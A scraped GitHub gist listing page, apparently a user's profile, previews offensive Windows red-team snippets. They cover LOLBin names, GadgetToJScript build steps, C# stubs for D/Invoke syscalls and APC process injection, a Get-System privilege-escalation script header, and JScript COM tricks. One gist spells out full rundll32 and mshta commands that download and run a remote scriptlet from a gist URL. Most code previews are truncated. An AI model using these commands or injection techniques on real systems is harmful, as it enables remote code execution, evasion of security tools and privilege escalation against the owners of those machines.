Skip to content

Instantly share code, notes, and snippets.

View bohops's full-sized avatar

bohops

468 followers · 13 following
View GitHub Profile
@MHaggis
MHaggis / lolbins.json
Last active June 26, 2019 01:32
lolbins
{
"Powershell": {
"process_name": ["powershell.exe"]
},
"Utilman": {
"process_name": ["utilman.exe"]
},
"msiexec": {
"process_name": ["msiexec.exe"]
},
@med0x2e
med0x2e / steps.txt
Last active September 18, 2021 19:58
Steps to run GadgetToJScript on linux (wine)
Steps:
1- apt-get install mono-complete
2- apt-get install wine winetricks -y
3- winetricks dotnet35
4- winetricks dotnet48
5- dpkg --add-architecture i386 && apt-get update && apt-get install wine32
6- rm -Rf ~/.wine
7- WINEPREFIX=~/.wine32 WINEARCH=win32 wineboot
8- wine GadgetToJScript.NET3.5.exe -r -c helloworld.cs -d System.Windows.Forms.dll -w hta -o hello
@ChoiSG
ChoiSG / dinvokeSyscall.cs
Created May 7, 2021 18:37
dinvoke with syscall - created for blog post
using System;
using DInvoke;
using System.Diagnostics;
using System.Runtime.InteropServices;
using DynamicInvoke = DInvoke.DynamicInvoke;
using Data = DInvoke.Data;
namespace dinvokeSyscall
{
class Program
@rvrsh3ll
rvrsh3ll / DInjectQueuerAPC.cs
Created November 20, 2020 15:10 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
@milo2012
milo2012 / Get-System.ps1
Last active November 22, 2021 18:50
Get-System.ps1
function Get-System {
<#
.SYNOPSIS
GetSystem functionality inspired by Meterpreter's getsystem.
Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: PSReflect
@rvrsh3ll
rvrsh3ll / blockdlls_gadget2jscript.cs
Last active January 24, 2022 14:45
using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.IO.Compression;
using System.Runtime.InteropServices;
public class Payload
{
public Payload()
@sammbertram
sammbertram / dynwrap.js
Created June 3, 2017 09:55
RegistrationFree DynamicWrapperX
var actCtx = new ActiveXObject( "Microsoft.Windows.ActCtx" );
actCtx.Manifest = "C:\\Tools\\COM\\dynwrap.test.manifest";
try
{
var DX = actCtx.CreateObject("DynamicWrapperX");
DX.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l"); // Register a dll function.
res = DX.MessageBoxW(0, "Hello, world!", "Test", 4); // Call the function.
}
catch(e){ WScript.Echo("Fail");}
@NickTyrer
NickTyrer / instructions.txt
Last active May 1, 2023 13:12
xwizard_sct
xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
verclsid.exe /S /C {00000001-0000-0000-0000-0000FEEDACDC}
create new folder and rename file.{00000001-0000-0000-0000-0000FEEDACDC}
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");close();
mshta javascript:o=GetObject("script:https://gist.githubusercontent.com/NickTyrer/0598b60112eaafe6d07789f7964290d5/raw/7717cfad109fc15a6796dd9119b0267f7a4df3fd/power.sct");o.Exec();close();
@rvrsh3ll
rvrsh3ll / gadget2jscriptQueueAPCInject.cs
Last active July 21, 2023 13:07
using System;
using System.IO;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Net;
using System.IO.Compression;
public class Payload
{
@mrpapercut
mrpapercut / 01.Callable_COM_Objects.txt
Last active September 29, 2023 13:22
Callable & uncallable COMObjects in wscript/cscript
// The following COMobjects are all callable in cscript with WScript.CreateObject(COMObject)
ADODB.Command is callable!
ADODB.Command.6.0 is callable!
ADODB.Connection is callable!
ADODB.Connection.6.0 is callable!
ADODB.Error is callable!
ADODB.Error.6.0 is callable!
ADODB.Parameter is callable!
ADODB.Parameter.6.0 is callable!
ADODB.Record is callable!